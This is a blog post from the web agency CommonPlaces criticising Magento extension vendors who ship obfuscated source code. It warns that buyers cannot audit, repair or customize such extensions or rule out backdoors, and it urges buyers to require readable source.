At CommonPlaces, our primary shopping cart and e-commerce platform that we recommend and use for clients is Magento. One of the greatest things about Magento is the vast number of extensions available to users. Magento Connect offers a series of extensions from a variety of vendors that allow the user to customize and enhance their Magento Store. Here, I would like to point out a few observations that I have made from my experience using Magento. Hopefully, from this, developers and consumers in the Magento Connect marketplace can make better decisions regarding the creation and use of Magento extensions.
Recently, I have had experiences with several commercial Magento Extensions whose authors have decided that using obfuscation techniques is a reasonable way to deliver source code. For those not familiar with code obfuscation, it is the process of making the normal source code very difficult or impossible for others to read and work with. For the most part, this technique has fallen out of practice, and for very good reasons.
From the seller’s perspective, code obfuscation techniques are great for promoting repeat business. Since the code is so hard for others to interpret and work with, the buyer is very likely to return to do more business with the seller. If the buyer wants to make repairs to the code in any way, he/she may find it necessary to go back to the seller for assistance. Similarly, if the buyer wants to make any customizations to the extension’s code, he/she may also need to employ the help of the seller to accomplish it.
This practice obviously has several downsides from the buyer’s perspective.
1. You cannot customize the software
2. You cannot make repairs
3.You cannot easily determine what it does
4. You cannot ensure the security of the extension
5. You cannot reason that it is not a backdoor
6. The code could be self updating
Even if you are not concerned about the first four above, number five should make you pause and ponder the situation. The fact that the code could be self updating should make you the most concerned. Even if you knew what the code would do today, it might react differently tomorrow or the next day. It is nearly impossible to establish that from reading the code alone. The image below is a winning entry in a code obfuscation contest. It serves as a good example of how difficult code obfuscation can be to decipher.
During the last year, I have encountered all 6 of these issues on behalf of clients seeking assistance with their existing web properties at one point or another. Of the issues I have mentioned, none of these are specific to Magento Extensions. But this marketplace does seem to be full of vendors who consider this a viable practice. To be clear, there are many, perhaps the majority, of venders who deliver normal code in their extensions. Still, encountering so many of the items above is a concerning reflection.
As a developer who uses Magento extensions very often, I offer a few suggestions to developers and consumers. If you are a developer of Magento Extensions, I strongly urge you to avoid this approach to source code delivery. While it has fallen out of practice, it can cause a great deal of frustration to consumers. As a consumer of Magento Extensions, I strongly recommend thinking twice before using extensions with this source code. Do some homework and evaluate the extensions before using them. Make sure the vendors with whom you are doing business provide you normal source code as a requirement of the transaction.
We all shoulder responsibility in providing secure e-commerce solutions, and this approach must be part of the consideration. If you have any questions about the e-commerce solutions, please feel free to contact the CommonPlaces team.